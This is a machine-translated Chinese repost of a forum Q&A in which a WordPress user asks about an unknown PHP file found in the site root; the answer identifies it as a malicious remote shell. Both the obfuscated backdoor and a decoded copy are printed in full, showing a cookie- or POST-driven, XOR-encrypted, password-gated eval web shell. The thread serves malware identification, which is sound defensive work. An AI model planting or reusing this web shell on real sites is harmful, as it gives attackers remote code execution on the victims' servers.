这是什么？病毒或扫描仪？

这是什么？病毒或扫描仪？

问题描述

我在我的 WP 根文件夹中找到一个新文件，并包含这个文本：

<?php ${"x47x4cx4fx42x41x4cx53"}["jdx67fx6fx77x6a"]="x64x61x74x61x5fx6bey";${"x47x4cx4fx42x41x4cx53"}["cx63x78x72x6ex73wx72x78x68"]="x64x61x74x61";${"x47x4cx4fBx41Lx53"}["gljjdjxqx74e"]="x64ax74x61";$hdhravkt="dx61x74a";${"x47x4cx4fx42Ax4cx53"}["ox74x7ax71x71lx6a"]="x76alx75e";${"x47Lx4fx42x41x4cS"}["pvvlx67x63x68"]="ax75x74x68";${"x47Lx4fx42Ax4cS"}["mx70x71x6ex63ifx6bx65mn"]="x6bx65y";${"x47x4cx4fx42x41x4cx53"}["x6dx71x65x6fsx70x70x62i"]="x6a";${"x47x4cOx42x41LS"}["x6bx6dbx68ix66x62"]="x69";${"x47x4cx4fBx41x4cS"}["x77mux70wxx62x65x6am"]="x6fut_x64x61x74x61";@ini_set("x65rrox72x5fx6cx6fg",NULL);@ini_set("x6cx6fgx5ferx72x6fx72s",0);@ini_set("maxx5fexex63x75tx69x6fx6ex5ftx69x6dx65",0);${"Gx4cOBx41Lx53"}["nx6bx6ax70x65x76fx6cyx79"]="x64x61x74x61x5fx6bx65x79";$orxtlbuxdn="x64x61tx61";@set_time_limit(0);if(!defined("Px48x50_x45x4fL")){define("Px48Px5fx45OL","n");}$cfusxjrfhr="vax6cue";if(!defined("Dx49x52ECTx4fx52x59_SEx50Ax52x41x54x4fR")){define("DIx52x45x43x54x4fx52Y_Sx45x50x41RATOx52","/");}${$orxtlbuxdn}=NULL;$scrxtpm="dx61x74x61";${${"x47x4cx4fBx41Lx53"}["x6ekx6ax70x65vfx6cx79x79"]}=NULL;$GLOBALS["x61uth"]="4ef6x33x61x62e-x31x61x62d-x34x35x61x36-913d-6x66x62x399x36x357x65x32x34b";global$auth;${"Gx4cOx42ALx53"}["x67x71cx71x69x61gtkd"]="x61x75x74x68";function sh_decrypt_phase($data,$key){$lougpr="i";${"Gx4cx4fBx41x4cx53"}["x78x79x75x6bx73x79x6ex6bx73"]="x64ax74x61";${${"Gx4cOx42x41x4cS"}["wx6dx75px77x78bx65x6ax6d"]}="";for(${${"x47LOx42Ax4cS"}["x6bx6dx62x68x69x66x62"]}=0;${$lougpr}<strlen(${${"x47Lx4fBALx53"}["xx79x75x6bx73x79x6ex6bs"]});){${"x47x4cx4fx42x41LS"}["nix6dzx78x6c"]="x6a";$jplufmtpaem="i";$dxzvtliuv="dax74x61";for(${${"x47LOx42ALS"}["x6dx71x65x6fsx70px62x69"]}=0;${${"x47Lx4fBx41x4cS"}["mx71x65x6fx73x70x70bi"]}<strlen(${${"x47x4cOBx41Lx53"}["x6dpqx6ex63x69x66x6bx65x6dx6e"]})&&${${"GLOx42x41LS"}["kx6dx62x68x69x66b"]}<strlen(${$dxzvtliuv});${${"Gx4cx4fx42ALx53"}["x6eix6dx7ax78x6c"]}++,${$jplufmtpaem}++){${"x47Lx4fx42x41x4cx53"}["wfx6cx79x6ehx75x6cx72x72"]="x6fx75x74_x64x61x74x61";${"x47LOx42x41x4cS"}["pcnbx79x71sx63x74x61x6f"]="x64x61x74x61";$kslqcnjzpl="j";${${"x47x4cx4fx42x41LS"}["wfx6cx79x6ehx75lx72x72"]}.=chr(ord(${${"GLOx42Ax4cx53"}["x70x63x6ebx79qx73cx74ax6f"]}[${${"x47x4cOx42x41x4cx53"}["x6bx6dx62x68ix66b"]}])^ord(${${"x47LOx42Ax4cx53"}["x6dpx71nx63x69x66x6bx65x6dx6e"]}[${$kslqcnjzpl}]));}}return${${"x47x4cx4fx42x41x4cS"}["wmux70x77x78x62x65jx6d"]};}function sh_decrypt($data,$key){$zhjqnlijbf="x6bx65x79";$rmzkqwtkh="x64x61x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$rmzkqwtkh},${${"x47x4cOx42x41x4cx53"}["pvx76x6cgx63x68"]}),${$zhjqnlijbf});}foreach($_COOKIE as${${"x47x4cOx42Ax4cx53"}["x6dx70qx6ex63ix66x6bx65mx6e"]}=>${$cfusxjrfhr}){${"x47Lx4fx42x41x4cS"}["x72x72x6fvx74x68x66bx77x63"]="x64ax74x61";$xlaknbhqsh="dx61x74x61x5fx6bx65x79";${${"Gx4cx4fx42ALx53"}["rx72ovtx68fx62x77x63"]}=${${"x47x4cx4fBx41x4cx53"}["x6fx74zx71x71x6cx6a"]};${$xlaknbhqsh}=${${"x47x4cx4fx42ALx53"}["mpx71nx63ix66kx65x6dx6e"]};}if(!${$scrxtpm}){${"x47Lx4fx42ALx53"}["ax63x69px66x72x69i"]="x76x61lx75x65";foreach($_POST as${${"x47x4cOx42x41x4cx53"}["x6dx70x71x6ex63ix66x6bx65mx6e"]}=>${${"x47x4cOBx41x4cS"}["ax63x69px66x72x69i"]}){${"x47Lx4fBx41x4cx53"}["mx67bx70yux78x61"]="x64ax74ax5fkx65x79";${"Gx4cOBALx53"}["x64rx6awkx67x68g"]="kex79";${${"x47x4cx4fBx41x4cS"}["ccx78x72x6ex73x77rxx68"]}=${${"x47x4cOx42x41LS"}["ox74x7ax71qx6cj"]};${${"x47x4cx4fBx41Lx53"}["x6dx67x62x70x79x75x78x61"]}=${${"x47x4cx4fx42x41x4cx53"}["drx6awkx67x68x67"]};}}${${"x47Lx4fBx41x4cS"}["x63x63x78x72x6ex73wx72x78x68"]}=@unserialize(sh_decrypt(@base64_decode(${${"x47x4cx4fx42Ax4cx53"}["x63x63x78x72x6eswx72xx68"]}),${${"Gx4cx4fx42Ax4cx53"}["x6ax64x67fx6fx77j"]}));if(isset(${${"x47x4cx4fx42x41Lx53"}["gx6cx6ajx64x6ax78x71x74x65"]}["ax6b"])&&${${"x47x4cx4fx42Ax4cS"}["x67x71cqix61gtx6bx64"]}==${$hdhravkt}["x61k"]){$efxgmzy="x64x61x74x61";if(${${"Gx4cOx42x41x4cx53"}["x63x63xrx6esx77rxx68"]}["x61"]=="x69"){${${"Gx4cOBAx4cx53"}["kx6dx62x68x69x66x62"]}=Array("x70x76"=>@phpversion(),"x73x76"=>"1x2e0-x31",);echo@serialize(${${"x47x4cOx42Ax4cx53"}["kx6dx62hx69x66b"]});}elseif(${$efxgmzy}["x61"]=="e"){${"x47x4cOx42x41x4cx53"}["gx6cx6eewx69x6bx61"]="x64atx61";eval(${${"Gx4cx4fx42Ax4cS"}["x67x6cx6ex65wix6bx61"]}["d"]);}}
?>

这是什么？

最佳解决方案

这是一个恶意的远程 shell 。这是 decoded version：

<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

function sh_decrypt_phase($data, $key) {
    $out_data = "";
    for ($i = 0; $i < strlen($data) {
        $jplufmtpaem = "i";
        for ($j = 0;$j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}

function sh_decrypt($data, $key) {
    global $auth;
    return sh_decrypt_phase(sh_decrypt_phase($data, $auth), $key);
}

foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        eval($data["d"]);
    }
}

?>

正如你所看到的，最后执行的命令是”eval”，它执行其作者注入的附加脚本。

参考文献

What is this? Virus or scanner? [closed]

注：本文内容整合自 Google/Baidu/Bing 辅助翻译的英文资料结果。如果您对结果不满意，可以加入我们改善翻译效果：薇晓朵技术论坛。

正男2015-07-11T17:27:42+08:00发表于：2015-07-11|WordPress|